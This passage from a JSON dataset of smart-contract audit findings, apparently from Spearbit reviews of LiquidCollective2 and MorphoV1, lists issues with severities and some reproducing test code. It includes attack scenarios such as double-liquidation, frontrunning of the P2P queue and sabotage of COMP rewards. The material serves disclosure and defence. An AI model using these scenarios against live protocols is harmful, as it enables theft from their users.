DelegateVotesChanged(src, oldWeight, newWeight); } if (dst != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[dst], _add, amount); emit DelegateVotesChanged(dst, oldWeight, newWeight); } } } When a vesting schedule is created, the creator has two options: 1) Specify a custom delegatee different from the beneficiary (or equal to it, but it's the same as option 2). 2) Leave the delegatee empty (equal to address(0)). Scenario 1) empty delegatee OR delegatee === beneficiary (same thing) After creating the vesting schedule, the voting power of the beneficiary will be equal to the amount of tokens vested. If the beneficiary did not call tlc.delegate(beneficiary) previously, after releasing some tokens, its voting power will be decreased by the amount of released tokens. 23 Scenario 2) delegatee !== beneficiary && delegatee !== address(0) Same thing as before, but now we have two different actors, one is the beneficiary and another one is the delegatee of the voting power of the vested tokens. If the beneficiary did not call tlc.delegate(vestingScheduleDelegatee) previously, after releasing some to- kens, the voting power of the current vested schedule's delegatee will be decreased by the amount of released tokens. Related test for scenario 1 //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testLosingPowerAfterRelease() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: false }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); assertEq(tlc.getVotes(alice), 10); 24 assertEq(tlc.balanceOf(alice), 0); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); tlc.releaseVestingSchedule(0); // Alice now owns the vested tokens just released but her voting power has decreased by the ,! amount released assertEq(tlc.getVotes(alice), 9); assertEq(tlc.balanceOf(alice), 1); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Fix mismatch between revert error message and code behavior", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The error message requires the schedule duration to be greater than the cliff duration, but the code allows it to be greater than or equal to the cliff duration.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Improve documentation and naming of period variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Similar to Consider renaming period to periodDuration to be more descriptive, the variable name and documentation are ambiguous. We can give a more descriptive name to the variable and fix the documenta- tion.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider renaming period to periodDuration to be more descriptive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "period can be confused as (for example) a counter or an id.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider removing coverageFunds variable and explicitly initialize executionLayerFees to zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Inside the OracleManager.setConsensusLayerData the coverageFunds variable is declared but never used. Consider cleaning the code by removing the unused variable. The executionLayerFees variable instead should be explicitly initialized to zero to not rely on compiler assump- tions.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider renaming IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The IVestingScheduleManager interface contains all ERC20VestableVotesUpgradeableV1 needs to implement and use. the events, errors, and functions that Because there's no corresponding VestingScheduleManager contract implementation, it would make sense to rename the interface to IERC20VestableVotesUpgradeableV1.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider renaming CoverageFundAddress COVERAGE_FUND_ADDRESS to be consistent with the current naming convention", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Consider renaming the constant used to access the unstructured storage slot COVERAGE_FUND_- ADDRESS. To follow the naming convention already adopted across all the contracts, the variable should be renamed to COVERAGE_FUND_ADDRESS_SLOT.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider reverting if the msg.value is zero in CoverageFundV1.donate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "In the current implementation of CoverageFundV1.donate there is no check on the msg.value value. Because of this, the sender can \"spam\" the function and emit multiple useless Donate events.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider having a separate function in River contract that allows CoverageFundV1 to send funds instead of using the same function used by ELFeeRecipientV1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "When the River contract calls the CoverageFundV1 contract to pull funds, the CoverageFundV1 sends funds to River by calling IRiverV1(payable(river)).sendELFees{value: amount}();. sendELFees is a function that is currently used by both CoverageFundV1 and ELFeeRecipientV1. function sendELFees() external payable { if (msg.sender != ELFeeRecipientAddress.get() && msg.sender != CoverageFundAddress.get()) { revert LibErrors.Unauthorized(msg.sender); } } It would be cleaner to have a separate function callable only by the CoverageFundV1 contract.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Extensively document how the Coverage Funds contract works", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The Coverage Fund contract has a crucial role inside the Protocol, and the current contract's docu- mentation does not properly cover all the needed aspects. Consider documenting the following aspects: General explanation of the Coverage Funds and it's purpose. Will donations happen only after a slash/penalty event? Or is there a \"budget\" that will be dumped on the contract regardless of any slashing events? If a donation of XXX ETH is made, how is it handled? In a single transaction or distributed over a period of time? Explain carefully that when ETH is donated, no shares are minted. Explain all the possible market repercussions of the integration of Coverage Funds. Is there any off-chain validation process before donating? 29 Who are the entities that are enabled to donate to the fund? How is the Coverage Funds integrated inside the current Alluvial protocol? Any additional information useful for the users, investors, and other actors that interact with the protocol.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Missing/wrong natspec comment and typos", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": " Natspec Missing part of the natspec comment for /// @notice Attempt to revoke at a relative to InvalidRevokedVestingScheduleEnd in IVestingScheduleManager Natspec missing the @return part for getVestingSchedule in IVestingScheduleManager. Wrong order of natspec @param for createVestingSchedule in IVestingScheduleManager. The @param _beneficiary should be placed before @param _delegatee to follow the function signature order. Natspec missing the @return part for delegateVestingEscrow in IVestingScheduleManager. Wrong natspec comment, operators should be replaced with vesting schedules for @custom:attribute of struct SlotVestingSchedule in VestingSchedules. 30 Wrong natspec parameter, replace operator with vesting schedule in the VestingSchedules.push func- tion. Missing @return natspec for _delegateVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _deterministicVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _getCurrentTime in ERC20VestableVotesUpgradeable. Add the Coverage Funds as a source of \"extra funds\" in the Oracle._pushToRiver natspec documentation in Oracle. Update the InvalidCall natspec in ICoverageFundV1 given that the error is thrown also in the receive() external payable function of CoverageFundV1. Update the natspec of struct VestingSchedule lockDuration attribute in VestingSchedules by explaining that the lock duration of a vesting schedule could possibly exceed the overall duration of the vesting. Update the natspec of lockDuration in ERC20VestableVotesUpgradeable by explaining that the lock dura- tion of a vesting schedule could possibly exceed the overall duration of the vesting. Consider making the natspec documentation of struct VestingSchedule in VestingSchedules and the natspec in ERC20VestableVotesUpgradeable be in sync. Add more examples (variations) to the natspec documentation of the vesting schedules example in ERC20VestableVotesUpgradeable to explain all the possible combination of scenarios. Make the ERC20VestableVotesUpgradeable natspec documentation about the vesting schedule consis- tent with the natspec documentation of _createVestingSchedule and VestingSchedules struct Vest- ingSchedule. Typos Replace all Overriden instances with Overridden in River. Replace transfer with transfers in ERC20VestableVotesUpgradeable.1.sol#L147. Replace token with tokens in ERC20VestableVotesUpgradeable.1.sol#L156.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Different behavior between River _pullELFees and _pullCoverageFunds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Both _pullELFees and _pullCoverageFunds implement the same functionality: Pull funds from a contract address. Update the balance storage variable. Emit an event. Return the amount of balance collected from the contract. The _pullCoverageFunds differs from the _pullELFees implementation by avoiding both updating the Balance- ToDeposit when collectedCoverageFunds == 0 and emitting the PulledCoverageFunds event. Because they are implementing the same functionality, they should follow the same behavior if there is not an explicit reason to not do so. 31", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Move local mask variable from Allowlist.1.sol to LibAllowlistMasks.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "LibAllowlistMasks.sol is meant to contain all mask values, but DENY_MASK is a local variable in the Allowlist.1.sol contract.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider adding additional parameters to the existing events to improve filtering/monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Some already defined events could be improved by adding more parameters to better track those events in dApps or monitoring tools. Consider adding address indexed delegatee as an event's parameter to event CreatedVestingSchedule. While it's true that after the vest/lock period the beneficiary will be the owner of those tokens, in the meanwhile (if _delegatee != address(0)) the voting power of all those vested tokens are delegated to the _delegatee. Consider adding address indexed beneficiary to event ReleasedVestingSchedule. Consider adding uint256 newEnd to event RevokedVestingSchedule to track the updated end of the vesting schedule. Consider adding address indexed beneficiary to event DelegatedVestingEscrow. If those events parameters are added to the events, the Alluvial team should also remember to update the relative natspec documentation.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Missing indexed keyword in events parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Some events parameters are missing the indexed keyword. Indexing specific parameters is partic- ularly important to later be able to filter those events both in dApps or monitoring tools. coverageFund event parameter should be declared as indexed in event SetCoverageFund. Both oldDelegatee and newDelegatee should be indexed in event DelegatedVestingEscrow. donator should be declared as indexed in event Donate.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Add natspec documentation to the TLC contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The current implementation of TLC contract is missing natspec at the root level to explain the contract. The natspec should cover the basic explanation of the contract (like it has already been done in other contracts like River.sol) but also illustrate TLC token has a fixed max supply that is minted at deploy time. All the minted tokens are sent to a single account at deploy time. How TLC token will be distributed. How voting power works (you have to delegate to yourself to gain voting power). How the vesting process works. Other general information useful for the user/investor that receives the TLC token directly or vested.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Liquidating Morpho's Aave position leads to state desync", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Morpho has a single position on Aave that encompasses all of Morpho's individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desyncs from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. It's also possible to double-liquidate for a profit. Example: There's a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The user's supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: High Risk" + ] + }, + { + "title": "A market could be deprecated but still prevent liquidators to liquidate borrowers if isLiquidateBor- rowPaused is true", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Currently, when a market must be deprecated, Morpho checks that borrowing has been paused before applying the new value for the flag. function setIsDeprecated(address _poolToken, bool _isDeprecated) external onlyOwner isMarketCreated(_poolToken) { } if (!marketPauseStatus[_poolToken].isBorrowPaused) revert BorrowNotPaused(); marketPauseStatus[_poolToken].isDeprecated = _isDeprecated; emit IsDeprecatedSet(_poolToken, _isDeprecated); The same check should be done in isLiquidateBorrowPaused, allowing the deprecation of a market only if isLiq- uidateBorrowPaused == false otherwise liquidators would not be able to liquidate borrowers on a deprecated market.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "setIsPausedForAllMarkets bypass the check done in setIsBorrowPaused and allow resuming borrow on a deprecated market", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The MorphoGovernance contract allow Morpho to set the isBorrowPaused to false only if the market is not deprecated. function setIsBorrowPaused(address _poolToken, bool _isPaused) external onlyOwner isMarketCreated(_poolToken) { } if (!_isPaused && marketPauseStatus[_poolToken].isDeprecated) revert MarketIsDeprecated(); marketPauseStatus[_poolToken].isBorrowPaused = _isPaused; emit IsBorrowPausedSet(_poolToken, _isPaused); This check is not enforced by the _setPauseStatus function, called by setIsPausedForAllMarkets allowing Mor- pho to resume borrowing for deprecated market. Test to reproduce the issue // SPDX-License-Identifier: AGPL-3.0-only pragma solidity ^0.8.0; import \"./setup/TestSetup.sol\"; contract TestSpearbit is TestSetup { using WadRayMath for uint256; function testBorrowPauseCheckSkipped() public { // Deprecate a market morpho.setIsBorrowPaused(aDai, true); morpho.setIsDeprecated(aDai, true); checkPauseEquality(aDai, true, true); // you cannot resume the borrowing if the market is deprecated hevm.expectRevert(abi.encodeWithSignature(\"MarketIsDeprecated()\")); morpho.setIsBorrowPaused(aDai, false); checkPauseEquality(aDai, true, true); // but this check is skipped if I call directly `setIsPausedForAllMarkets` morpho.setIsPausedForAllMarkets(false); // this should revert because // you cannot resume borrowing for a deprecated market checkPauseEquality(aDai, false, true); } function checkPauseEquality( address aToken, bool shouldBePaused, 6 bool shouldBeDeprecated ) public { ( bool isSupplyPaused, bool isBorrowPaused, bool isWithdrawPaused, bool isRepayPaused, bool isLiquidateCollateralPaused, bool isLiquidateBorrowPaused, bool isDeprecated ) = morpho.marketPauseStatus(aToken); assertEq(isBorrowPaused, shouldBePaused); assertEq(isDeprecated, shouldBeDeprecated); } }", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "User withdrawals can fail if Morpho position is close to liquidation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When trying to withdraw funds from Morpho as a P2P supplier the last step of the withdrawal algorithm borrows an amount from the pool (\"hard withdraw\"). If the Morpho position on Aave's debt / collateral value is higher than the market's max LTV ratio but lower than the market's liquidation threshold, the borrow will fail and the position can also not be liquidated. The withdrawals could fail.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "P2P borrowers' rate can be reduced", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Users on the pool currently earn a much worse rate than users with P2P credit lines. There's a queue for being connected P2P. As this queue could not be fully processed in a single transaction the protocol introduces the concept of a max iteration count and a borrower/supplier \"delta\" (c.f. yellow paper). This delta leads to a worse rate for existing P2P users. An attacker can force a delta to be introduced, leading to worse rates than before. Example: Imagine some borrowers are matched P2P (earning a low borrow rate), and many are still on the pool and therefore in the pool queue (earning a worse borrow rate from Aave). An attacker supplies a huge amount, creating a P2P credit line for every borrower. (They can repeat this step several times if the max iterations limit is reached.) 7 The attacker immediately withdraws the supplied amount again. The protocol now attempts to demote the borrowers and reconnect them to the pool. But the algorithm performs a \"hard withdraw\" as the last step if it reaches the max iteration limit, creating a borrower delta. These are funds borrowed from the pool (at a higher borrowing rate) that are still wrongly recorded to be in a P2P position for some borrowers. This increase in borrowing rate is socialized equally among all P2P borrowers. (reflected in an updated p2pBorrowRate as the shareOfDelta increased.) The initial P2P borrowers earn a worse rate than before. If the borrower delta is large, it's close to the on-pool rate. If an attacker-controlled borrower account was newly matched P2P and not properly reconnected to the pool (in the \"demote borrowers\" step of the algorithm), they will earn a better P2P rate than the on-pool rate they earned before.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk Original" + ] + }, + { + "title": "Frontrunners can exploit system by not allowing head of DLL to match in P2P", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "For a given asset x, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x whenever there is a new transaction in the mempool to borrow 100 units of x, Frontrunner supplies 1001 units of x and is supplied on pool. updateSuppliers will put the frontrunner on the head (assuming very high gas is supplied). Borrower's transaction lands and is matched 100 units of x with a frontrunner in p2p. Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: Relatively fewer gas fees & relatively high block gas limit. insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a block's time period.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Differences between Morpho and Compound borrow validation logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; Compound has a mechanism to prevent borrows if the new borrowed amount would go above the current borrowCaps[cToken] threshold. Morpho does not check this threshold and could allow users to borrow on the P2P side (avoiding the revert because it would not trigger the underlying compound borrow action). Morpho should anyway monitor the borrowCaps of the market because it could make increaseP2PDeltasLogic and _unsafeWithdrawLogic reverts. Both Morpho and Compound do not check if a market is in \"deprecated\" state. This means that as soon as a user borrows some tokens, he/she can be instantly liquidated by another user. If the flag is true on Compound, the Morpho User can be liquidated directly on compound. If the flag is true on Morpho, the borrower can be liquidated on Morpho. Morpho does not check if borrowGuardianPaused[cToken] on Compound, a user could be able to borrow in P2P while the cToken market has borrow paused. More information about detailed information can be found in the discussion topic \"Differences in actions checks between Morpho and Compound\".", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Users can continue to borrow from a deprecated market", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When a market is being marked as deprecated, there is no verification that the borrow for that market has already been disabled. This means a user could borrow from this market and immediately be eligible to be liquidated.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "ERC20 with transfer's fee are not handled by *PositionManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Some ERC20 tokens could have fees attached to the transfer event, while others could enable them in the future (see USDT, USDC). The current implementation of both PositionManager (for Aave and Compound) is not taking into consideration these types of ERC20 tokens. While Aave seems not to take into consideration this behavior (see LendingPool.sol), Compound, on the other hand, is explicitly handling it inside the doTransferIn function. Morpho is taking for granted that the amount specified by the user will be the amount transferred to the contract's balance, while in reality, the contract will receive less. In supplyLogic, for example, Morpho will account for the user's p2p/pool balance for the full amount but will repay/supply to the pool less than the amount accounted for.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Cannot liquidate Morpho users if no liquidity on the pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Morpho implements liquidations by repaying the borrowed asset and then withdrawing the collateral If there is no liquidity in the collateral asset pool the asset from the underlying protocol (Aave / Compound). liquidation will fail. Morpho could incur bad debt as they cannot liquidate the user. The liquidation mechanisms of Aave and Compound work differently: They allow the liquidator to seize the debtorsTokens/cTokens which can later be withdrawn for the underlying token once there is enough liquidity in the pool. Technically, an attacker could even force no liquidity on the pool by frontrunning liquidations by borrowing the entire pool amount - preventing them from being liquidated on Morpho. However, this would require significant capital as collateral in most cases.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Supplying and borrowing can recreate p2p credit lines even if p2p is disabled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When supplying/borrowing the algorithm tries to reduce the deltas p2pBorrowDelta/p2pSupplyDelta by moving borrowers/suppliers back to P2P. It is not checked if P2P is enabled. This has some consequences related to when governance disables P2P and wants to put users and liquidity back on the pool through increaseDelta calls. The users could enter P2P again by supplying and borrowing.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "In Compound implementation, P2P indexes can be stale", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current implementation of MorphoUtils._isLiquidatable loops through all of the tokens in which the user has supplied to/borrowed from. The scope of the function is to check whether the user can be liquidated or not by verifying that debtValue > maxDebtValue. Resolving \"Compound liquidity computation uses outdated cached borrowIndex\" implies that the Compound bor- row index used is always up-to-date but the P2P issues associated with the token could still be out of date if the market has not been used recently, and the underlying Compound indexes (on which the P2P index is based) has changed a lot. As a consequence, all the functions that rely on _isLiquidatable (liquidate, withdraw, borrow) could return a wrong result if the majority of the user's balance is on the P2P balance (the problem is even more aggravated without resolving \"Compound liquidity computation uses outdated cached borrowIndex\". Let's say, for example: Alice supplies ETH in pool Alice supplies BAT in P2P Alice borrows some DAI At some point in time the ETH value goes down, but the interest rate of BAT goes up. If the P2P index of BAT had been correctly up-to-date, Alice would have been still solvent, but she gets liquidated by Bob who calls liq- uidate(alice, ETH, DAI) Even by fixing \"Compound liquidity computation uses outdated cached borrowIndex\" Alice would still be liquidated because her entire collateral is on P2P and not in the pool.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Turning off an asset as collateral on Morpho-Aave still allows seizing of that collateral on Morpho and leads to liquidations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The Morpho Aave deployment can set the asset to not be used as collateral for Aave's Morpho contract position. On Aave, this prevents liquidators from seizing this asset as collateral. 1. However, this prevention does not extend to users on Morpho as Morpho has not implemented this check. Liquidations are performed through a repay & withdraw combination and withdrawing the asset on Aave is still allowed. 2. When turning off the asset as collateral, the single Morpho contract position on Aave might still be over- collateralized, but some users on Morpho suddenly lose this asset as collateral (LTV becomes 0) and will be liquidated.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "claimToTreasury(COMP) steals users' COMP rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The claimToTreasury function can send a market's underlying tokens that have been accumulated in the contract to the treasury. This is intended to be used for the reserve amounts that accumulate in the contract from P2P matches. However, Compound also pays out rewards in COMP and COMP is a valid Compound market. Sending the COMP reserves will also send the COMP rewards. This is especially bad as anyone can claim COMP rewards on the behalf of Morpho at any time and the rewards will be sent to the contract. An attacker could even frontrun a claimToTreasury(cCOMP) call with a Comptroller.claimComp(morpho, [cComp]) call to sabotage the reward system. Users won't be able to claim their rewards.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "Compound liquidity computation uses outdated cached borrowIndex", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The _isLiquidatable iterates over all user-entered markets and calls _getUserLiquidity- DataForAsset(poolToken) -> _getUserBorrowBalanceInOf(poolToken). However, it only updates the indexes of markets that correspond to the borrow and collateral assets. The _getUserBorrowBalanceInOf function computes the underlying pool amount of the user as userBorrowBalance.onPool.mul(lastPoolIndexes[_- poolToken].lastBorrowPoolIndex);. Note that lastPoolIndexes[_poolToken].lastBorrowPoolIndex is a value that was cached by Morpho and it can be outdated if there has not been a user-interaction with that market for a long time. The liquidation does not match Compound's liquidation anymore and users might not be liquidated on Morpho that could be liquidated on Compound. Liquidators would first need to trigger updates to Morpho's internal borrow indexes.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Medium Risk" + ] + }, + { + "title": "HeapOrdering.getNext returns the root node for nodes not in the list", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "If an id does not exist in the HeapOrdering the getNext() function will return the root node uint256 rank = _heap.ranks[_id]; // @audit returns 0 as rank. rank + 1 will be the root if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id; else return address(0);", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "Heap only supports balances up to type(uint96).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current heap implementation packs an address and the balance into a single storage slot which If a token has 18 decimals, the largest restricts the balance to the uint96 type with a max value of ~7.9e28. balance that can be stored will be 7.9e10. This could lead to problems with a token of low value, for example, if 1.0 tokens are worth 0.0001$, a user could only store 7_900_000$.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "Delta leads to incorrect reward distributions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Delta describes the amount that is on the pool but still wrongly tracked as inP2P for some users. There are users that do not have their P2P balance updated to an equivalent pool balance and therefore do not earn rewards. There is now a mismatch of this delta between the pool balance that earns a reward and the sum of pool balances that are tracked in the reward manager to earn that reward. The increase in delta directly leads to an increase in rewards for all other users on the pool.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "When adding a new rewards manager, users already on the pool won't be earning rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When setting a new rewards manager, existing users that are already on the pool are not tracked and won't be earning rewards.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Low Risk" + ] + }, + { + "title": "liquidationThreshold computation can be moved for gas efficiency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The vars.liquidationThreshold computation is only relevant if the user is supplying this asset. Therefore, it can be moved to the if (_isSupplying(vars.userMarkets, vars.borrowMask)) branch.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Gas Optimization" + ] + }, + { + "title": "Add max approvals to markets upon market creation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Approvals to the Compound markets are set on each supplyToPool function call.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Gas Optimization" + ] + }, + { + "title": "isP2PDisabled flag is not updated by setIsPausedForAllMarkets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The current implementation of _setPauseStatus does not update the isP2PDisabled. When _- isPaused = false this is not a real problem because once all the flags are enabled (everything is paused), all the operations will be blocked at the root of the execution of the process. There might be cases instead where isP2PDisabled and the other flags were disabled for a market and Morpho want to enable all of them, resuming all the operations and allowing the users to continue P2P usage. In this case, Morpho would only resume operations without allowing the users to use the P2P flow. function _setPauseStatus(address _poolToken, bool _isPaused) internal { Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken]; pause.isSupplyPaused = _isPaused; pause.isBorrowPaused = _isPaused; pause.isWithdrawPaused = _isPaused; pause.isRepayPaused = _isPaused; pause.isLiquidateCollateralPaused = _isPaused; pause.isLiquidateBorrowPaused = _isPaused; // ... event emissions }", + "labels": [ + 